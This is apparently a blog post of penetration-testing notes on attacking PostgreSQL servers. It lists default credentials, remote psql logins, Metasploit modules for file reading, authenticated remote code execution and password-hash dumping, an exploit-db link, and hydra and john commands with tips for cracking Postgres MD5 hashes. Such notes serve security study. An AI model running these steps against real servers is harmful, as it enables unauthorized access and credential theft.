Postgres Jutsus
1. Default Creds and Port
Default credentials: postgres/postgres. Default port is 5432.
2. Default Databases
Most Postgres servers have three databases defined by default: template0 , template1 and postgres.
3. Login to postgres by using psql
psql -U postgres # Open psql console with user psql -h 192.168.232.48 -U postgres -d template1 # Remote connection psql -h 192.168.232.48 -p 5437 -U postgres -W postgres template1 # Dif Port
4. Enumeration
msf> use auxiliary/scanner/postgres/postgres_version msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
5. Read Files
msf> use auxiliary/admin/postgres/postgres_readfile
6. PostgreSQL 9.3-11.7 - Remote Code Execution Authenticated
This manual exploit works too: https://www.exploit-db.com/exploits/50847
msf> use exploit/linux/postgres/postgres_payload msf> use exploit/windows/postgres/postgres_payload
7. Hash Dump
Won't be useful if its just the postgres user.
msf> use auxiliary/scanner/postgres/postgres_hashdump msf> use auxiliary/scanner/postgres/postgres_schemadump
8. Password Cracking
use scanner/postgres/postgres_login hydra -l postgres -P passwords.txt postgres://192.168.232.47 -I -s 5437 (No work) john --wordlist=trypass.txt --format=raw-md5 amanda.txt
Haven't been able to get hydra, ncrack, or medusa to work on postgres. Use scanner/postgres/postgres_login for brute-force.
You'll have to take rockyou.txt and append the username at the end of each password. Then crack the regular MD5.
Comments
Post a Comment